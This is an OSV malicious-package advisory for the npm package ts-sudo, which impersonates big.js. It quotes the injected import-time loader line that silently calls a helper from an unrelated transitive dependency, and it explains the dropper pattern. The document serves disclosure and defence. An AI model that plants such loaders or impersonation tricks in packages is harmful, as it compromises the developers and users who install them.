ts-sudo@1.0.0

Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC

Malicious

OSV ID

MAL-2026-6323

Ecosystem

npm

Summary

The package publishes under the name ts-sudo but ships a verbatim copy of the big.js v7.0.1 source (big.js, big.mjs) along with big.js's description, repository URL (MikeMcl/big.js), and keyword set (bignumber, bigint). Inside the otherwise-legitimate big.js source, a loader has been injected at big.js:606: try { const doc = require("parket-helper"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }. The same injection is present in big.mjs. This block fires automatically on require('ts-sudo') / import 'ts-sudo', silently invoking parket-helper.from_str(), a package the consumer never chose to depend on. parket-helper is pulled into the install tree via the declared dependency "server-parket": "^3.8.1" in package.json:58. The wrapper is benign-looking arithmetic code; the harmful behavior is delegated to the opaque dependency, and errors are swallowed (by the outer try/catch and the empty .catch handler) to hide failures from the caller. The combination of (a) impersonating a well-known library's name and contents, (b) an injected import-time call into an unrelated helper, and (c) reliance on a suspiciously named transitive dependency to deliver the payload is a textbook dropper pattern.

Source: amazon-inspector (1a6e18b2d6bef04dd8377fac8d9b20e5545f1ec39875fdd308adf118b6f319d1)